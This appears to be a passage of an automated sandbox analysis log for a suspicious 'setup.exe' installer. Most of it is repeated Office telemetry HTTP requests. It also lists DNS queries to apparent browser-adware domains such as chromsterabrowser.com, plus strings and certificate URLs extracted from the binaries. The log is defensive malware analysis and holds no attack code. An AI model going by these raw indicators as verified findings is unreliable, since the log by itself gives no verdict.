                      Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1730743968&P2=404&P3=2&P4=Wrd8ru3elfd9jwwVA5G6RHmd6vG5sKYlGMT5c86MTidAQ0tDgfnQ9YY1PzzS5qN6OVHCl6NdqNQitO2C6oK2CQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: JN3t9tLnHvPwoNcvg4GThUSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: setup.exe, 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000000.00000000.1694822221.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: FlashWindowExFlashWindowGetPackagePathhttp://www.google.comTESTtin9999.tmphttp://www.yahoo.comhttp://www.example.com.part= "GETattachmentDLD123filenamecharsetutf-16ISO-8859-1POSTutf-8Local Network ServerFTP ServerUS-ASCIIAdvancedInstallerRange: bytes=%u- equals www.yahoo.com (Yahoo)
                      Source: setup.exeString found in binary or memory: VFlashWindowExFlashWindowGetPackagePathhttp://www.google.comTESTtin9999.tmphttp://www.yahoo.comhttp://www.example.com.part= "GETattachmentDLD123filenamecharsetutf-16ISO-8859-1POSTutf-8Local Network ServerFTP ServerUS-ASCIIAdvancedInstallerRange: bytes=%u- equals www.yahoo.com (Yahoo)
                      Source: setup.exeString found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: chromsterabrowser.com
                      Source: global trafficDNS traffic detected: DNS query: secure.chromstera.com
                      Source: global trafficDNS traffic detected: DNS query: chromsteraupdates.com
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 18:11:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeReferrer-Policy: no-referrercf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4g0jurbb%2FylK2vxdGNtVOvYJ6WuYmHIJDz157KP1iuDbj2hgY2dNAcVG1v85MCCMcU0hYATOIB9I3tzplk3I1Dg4PmrjZncSKwOyB6wlxUdmw34FPOLlgKRlbM8Xx1WKD%2BUSuEFMME%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d9ce38bffc5e96a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=733&delivery_rate=1698533&cwnd=248&unsent_bytes=0&cid=2453cd3faa7abb50&ts=320&x=0"
                      Source: shi3105.tmp.0.drString found in binary or memory: http://.css
                      Source: shi3105.tmp.0.drString found in binary or memory: http://.jpg
                      Source: setup.exe, 00000000.00000002.2952389573.0000000005B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.cX
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTruste
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                      Source: svchost.exe, 0000001B.00000002.2953061527.00000278DA400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
